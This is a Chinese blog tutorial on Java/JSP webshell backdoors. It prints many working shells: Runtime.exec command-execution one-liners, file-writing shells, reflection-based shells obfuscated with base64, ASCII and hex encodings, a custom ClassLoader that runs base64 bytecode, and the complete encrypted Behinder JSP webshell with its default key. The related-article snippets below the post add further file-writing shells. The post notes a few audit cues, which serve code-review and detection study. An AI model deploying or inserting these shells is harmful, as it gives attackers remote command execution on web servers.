Java安全-Java Web后门学习 Jsp 一句话分析

最新推荐文章于 2023-09-09 17:44:30 发布
原创 最新推荐文章于 2023-09-09 17:44:30 发布 · 5.1k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #java进阶 #后端

本文探讨了Java Web后门,包括一句话木马的原理和实现,通过反射调用和类加载的方式详细解释了后门的创建。重点介绍了如何使用Runtime.exec()和ProcessBuilder.start()执行系统命令,以及通过自定义ClassLoader实现动态加载和执行字节码文件,类似于PHP的eval功能。此外,提到了JDK新特性和Lambda表达式在创建后门中的应用。
部署运行你感兴趣的模型镜像

文章目录

Java Web后门

Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用

Java 中常用的命令执行函数

  1. java.lang.Runtime.exec()
  2. java.lang.ProcessBuilder.start()

一句话木马

最简单的 jsp 一句话木马

<% Runtime.getRuntime().exec(request.getParameter("i"));%>

其实这就和 PHP 的一句话一样

<?PHP eval($GET_['i']);?>

但是 jsp 一句话没有回显,无法看到返回的信息,通常用来反弹 shell,下面的代码是一个有回显并且需要密码验证的 jsp 木马

<%
    if ("ocean".equals(request.getParameter("pwd"))) {
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while ((a = in.read(b)) != -1) {
            out.print(new String(b));
        }
        out.print("</pre>");
    }

%>

image-20220503105715535

Runtime 类封装了运行时的环境。每个 Java 应用程序都有一个 Runtime 类实例,使应用程序能够与其运行的环境相连接。使用 getRuntime() 构建 Runtime 类实例。 getRuntime() 返回与当前 Java 应用程序相关的运行时对象。获取实例后调用 exec() 方法执行系统命令

request 为 JSP 内置对象,getParameter() 方法获取请求参数 cmd的值构建命令

其中:HTML里的 pre 标签,可定义预格式化的文本。在 pre 元素中的文本会保留空格和换行符。文本显现为等宽字体,经常会在要保持文本格式的时候使用 pre 标签,比如当我们要展示源代码的时候,只要放一个 pre 标签,然后把源代码直接复制,粘贴,然后在页面上就可以保持好格式。不会像放在其它标签里那样,把换行和空格都自动折叠了

执行效果如下

image-20220503110252726

Windows 操作系统中可能会带来乱码问题,可以在文件头加上以下两句解决

<%@ page contentType="text/html;charset=GBK"%>
<%@ page contentType="text/html;charset=gb2312"%>

当然除了把数据回显也可以写入执行文件中

<%new java.io.FileOutputStream(request.getParameter("filename")).wirte(request.getParameter("cmd").getBytes());%>

或者写入 web 目录

<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("filename")).wirte(request.getParameter("cmd").getBytes());%>

这种是最简单的一句话,审计时很容易被发现

反射调用

因为反射可以调用各种私有类方法,所以利用反射的后门比较多

<%@page contentType="text/html; charset=UTF-8" language="java" %>
<%@page import="sun.misc.BASE64Decoder" %>
<%@page import="java.lang.reflect.Method" %>
<%
    BASE64Decoder base64Decoder = new BASE64Decoder();
    Class runtime = Class.forName(new String(base64Decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
    Process method = (Process) runtime.getMethod(new String(base64Decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(runtime.getMethod(new String(base64Decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new Object[] {
    }), request.getParameter("cmd"));

    java.io.InputStream in = method.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while ((a = in.read(b)) != -1) {
        out.print(new String(b));
    }
    out.print("</pre>");
%>

重点就是这段代码

image-20220503134018222

去掉 base64 就是以下代码

Class runtime = Class.forName("java.lang.Runtime");
Process method = (Process) runtime.getMethod("exec",String.class).invoke(runtime.getMethod("getRuntime").invoke(null, new Object[]{}), request.getParameter("cmd"));

非常经典的反射

没有直接使用调用方法的方式去构造后门,而是采用动态加载的方式,把所要调用的类与函数放到一个字符串的位置,然后利用变形来隐藏关键函数,这里用的是 base64,同理可以使用 hex 和 ascii 的编码绕过

Acsii

<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%
    if(request.getParameter("cmd")!=null){
        Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }));
        Process e = (Process) rt.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class).invoke(rt.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })).invoke(null), request.getParameter("cmd") );
        java.io.InputStream in = e.getInputStream();
        int a = -1;byte[] b = new byte[2048];out.print("<pre>");
        while((a=in.read(b))!=-1){ out.println(new String(b)); }out.print("</pre>");
    }
%>

Hex

<%@ page contentType="text/html;charset=UTF-8" import="javax.xml.bind.DatatypeConverter" language="java" %>
<%
    if(request.getParameter("cmd")!=null){
        Class rt = Class.forName(new String(DatatypeConverter.parseHexBinary("6a6176612e6c616e672e52756e74696d65")));
        Process e = (Process) rt.getMethod(new String(DatatypeConverter.parseHexBinary("65786563")), String.class).invoke(rt.getMethod(new String(DatatypeConverter.parseHexBinary("67657452756e74696d65"))).invoke(null), request.getParameter("cmd") );
        java.io.InputStream in = e.getInputStream();
        int a = -1;byte[] b = new byte[2048];out.print("<pre>");
        while((a=in.read(b))!=-1){ out.println(new String(b)); }out.print("</pre>");
    }
%>

类加载(冰蝎马实现方式)

对于类加载是直接传送二进制的字节码(动态解析

java 执行代码的时候要先编译成 .class 字节码的文件才能被 jvm 所执行。如果实现任意 class 文件的加载,相当于实现了 php 中 eval 命令执行函数,即可以做到将字符串作为代码来执行

Demo

  1. 新建文件 Calc.java 首先写一个命令执行的类,调用 calc

    import java.io.IOException;
public class Calc {
    @Override
    public String toString() {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
        return "OK";
    }
}

    然后使用命令编译生成字节码文件

    javac .Calc.java

    image-20220503142129866

  2. 主运行程序类 Loader

    import sun.misc.BASE64Decoder;
import sun.misc.BASE64Encoder;

import java.io.File;
import java.io.FileInputStream;

public class Loader {
    //实现二进制文件转成base64
    public static String encodeBase64File(String path) throws Exception {
        File file = new File(path);
        ;
        FileInputStream inputFile = new FileInputStream(file);
        byte[] buffer = new byte[(int) file.length()];
        inputFile.read(buffer);
        inputFile.close();
        return new BASE64Encoder().encode(buffer);

    }

    public static class Myloader extends ClassLoader //继承ClassLoader
    {
        public Class get(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public static void main(String[] args) throws Exception {
        String classStr = "yv66vgAAADQAKQoACQAZCgAaABsIABwKABoAHQcAHgoABQAfCAAgBwAhBwAiAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABBMb2JmdXNjYXRlL0NhbGM7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAA1TdGFja01hcFRhYmxlBwAeAQAKU291cmNlRmlsZQEACUNhbGMuamF2YQwACgALBwAjDAAkACUBAAhjYWxjLmV4ZQwAJgAnAQATamF2YS9pby9JT0V4Y2VwdGlvbgwAKAALAQACT0sBAA5vYmZ1c2NhdGUvQ2FsYwEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEACAAJAAAAAAACAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAABAAOAAAADAABAAAABQAPABAAAAABABEAEgABAAwAAABtAAIAAgAAABS4AAISA7YABFenAAhMK7YABhIHsAABAAAACQAMAAUAAwANAAAAFgAFAAAACAAJAAsADAAJAA0ACgARAAwADgAAABYAAgANAAQAEwAUAAEAAAAUAA8AEAAAABUAAAAHAAJMBwAWBAABABcAAAACABg="; // Calc.class的base64编码
        BASE64Decoder code = new sun.misc.BASE64Decoder();
//        String re = encodeBase64File("C:\Users\q2723\Desktop\Calc.class");
//        System.out.println(re);
        Class result = new Myloader().get(code.decodeBuffer(classStr));//将base64解码成byte数组,并传入t类的get函数
        System.out.println(result.newInstance().toString());
    }
}

    注意修改 class 文件所在位置

    image-20220503143204959

成功执行系统命令

image-20220503144213070

代码重点就在红框中,正常情况下,Java 并没有提供直接解析 class 字节数组的接口。不过 classloader 内部实现了一个 protected 的 defineClass 方法,可以将 byte[] 直接转换为 Class,因为该方法是 protected 的,我们没办法在外部直接调用,可以通过直接自定义一个类继承 classloader,然后在子类中调用父类的 defineClass 方法

这样传入的二进制字节码 class 文件直接就加载执行了,真的有点 PHP EVAL 的感觉了

这个 Demo 就是冰蝎实现服务端(即上传到目标机器的 jsp 马)的原型,具体可以看这篇文章:利用动态二进制加密实现新型一句话木马之Java篇

作者在进行简化成了一行,这就是现在用的冰蝎的 jsp 马,具有动态解密功能的、能解析执行任意二进制流的新型一句话木马

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

对于此类后门通常采用后门扫描工具检测,人工审计时要关注加密函数 BASE64Decoder() 以及 SecretKeySpec()

ELSE

  • JDK 新特性

    利用 Lambda 表达式编写的 JSP 一句话木马

    访问接口中的默认方法 Reduce 来编写 JSP 一句话木马

  • 各种表达式

  • 内存马

可以看参考文章,其中提及了很多方式

参考

利用动态二进制加密实现新型一句话木马之Java篇

jsp一句话木马

《Java 代码审计入门》

WebShell免杀之JSP

您可能感兴趣的与本文相关的镜像

Yolo-v8.3

Yolo-v8.3

Yolo

YOLO(You Only Look Once)是一种流行的物体检测和图像分割模型,由华盛顿大学的Joseph Redmon 和Ali Farhadi 开发。 YOLO 于2015 年推出,因其高速和高精度而广受欢迎

JSP WebSehll 后门脚本
悦分享
08-01 1593
目前很多大型厂商都选择使用Java进行Web项目的开发,近年来随着各种JAVA指定环境RCE漏洞的出现,JavaWeb安全逐渐被人们所重视,与漏洞相关的还有用于后期维持权限的Webshell。与PHP不同的是,JSP的语言特性较为严格,属于强类型语言,并且在JDK9以前并没有所谓的eval函数。般而言JSP的变形免杀较为困难,但是依旧存在很多的”黑魔法”。不知攻,焉知防。阿里云安骑士Webshell检测系统在迭代升级过程中,除了内部的不断绕过尝试以外,也长期邀请大量白帽子进行持续的绕过测试。...
内存马介绍及分析-带查杀工具tomcat memshell scanner.jsp
最新发布
weixin_65629944的博客
12-18 1548
先判断是通过什么方法注入的内存马,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。
JSP句话后门
01-08
<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes()); %> 使用方法: 提交url! jsp?f=1.txt” target=”_blank”>http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld 然后:http://www.whitehouse.net
JSP句话后门--2006-08-03
Quantum Intelligence
09-03 5887
...之前的原创都给人家抬走了!真郁闷.这次 在这里说明~  [转载请注名 無名氏nonamed 作品]java是 面向对象编程的语言了! 啥都是对象!基于编译与解析之间~~-_- ... 估计没有eval  execute这样功能的函数了!...但是还是可以留句话后门的 本来我想用反射实现 像 eval这样的功能.....但是失败了!郁闷!后来没有办法~~ 算了~~ 这样实现吧!
jsp句话
weixin_33728268的博客
08-22 582
&lt;%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%&gt;&lt;%!String Pwd="1.2.3";String EC(String s,String c)throws Exception{return new String(s.getBytes("ISO-8859-1"),c);}Con...
jsp 不解析pre_Jsp后门Jsp 句话木马后门详解
weixin_42146230的博客
01-13 869
:执行系统命令:无回显执行系统命令:请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,用来反弹个shell很方便。有回显带密码验证的:if("023".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec...
Webshell句话攻击技巧:PHP、ASP、JSP常见实现与防范
2. ASP.NET和JSP句话Webshell: - ASP.NET:通过设置`validateRequest="false"`,可以绕过安全检查,如`<%@PageLanguage="Jscript"validateRequest="false"%><%Response.Write(eval(Request.Item["w"],"unsafe"))...
JSP句话代码
05-15
JSP句话代码
jspshell 句话
07-24
jsp shell
JSP句话下载代码
12-30
JSP句话下载代码
句话木马:JSP
09-21 9397
JSP句话收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
jsp句话小马
weixin_42786460的博客
09-09 1599
jsp句话小马
JSP句话后门(转)
weixin_30776545的博客
10-05 287
<%  if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());  %>  这个 后门估计不用我说了吧.还是提示下咯...
句话经典」JavaWeb中的JSP
z00238082的博客
01-24 2008
JSP内置对象及其作用: request:用户端请求,此请求会包含来自GET/POST请求的参数; response:网页传回用户端的回应; pageContext:网页的属性是在这里管理的; Session:与请求有关的会话周期; application:Servlet正在执行的内容; Out:用来传送回应的输出; Config:Servlet的架构部件; Page:JSP网页本
jsp句话总结
weixin_45486362的博客
06-25 5701
** 基本原理 ** 由于Java中没有所谓的eval函数,无法对直接传递的代码进行解析执行。所以不管是蚁剑还是菜刀对于JSP的shell直是采用custom模式,即把要执行的代码提前写在shell中,然后每次只需要传递要调用的函数名以及对应的参数即可。 虽然可以实现相应的功能,但是带来个问题就是shell体积非常巨大。菜刀的jsp脚本有7kb大小,蚁剑的jsp custom脚本即使去掉注释后还有17k之多,用起来非常的不方便。 冰蝎的作者rebeyond大佬在文章 利用动态二进制加密实现新型句话木马
JSP句话小马
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
11-13 3319
<%! class NATIVE extends ClassLoader{ NATIVE(ClassLoader c){super(c);} public Class routine(byte[] b){ return super.defineClass(b, 0, b.length); } } public byte[] runtime(String str) throws Exception { Class base64; byte[] value = null; ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值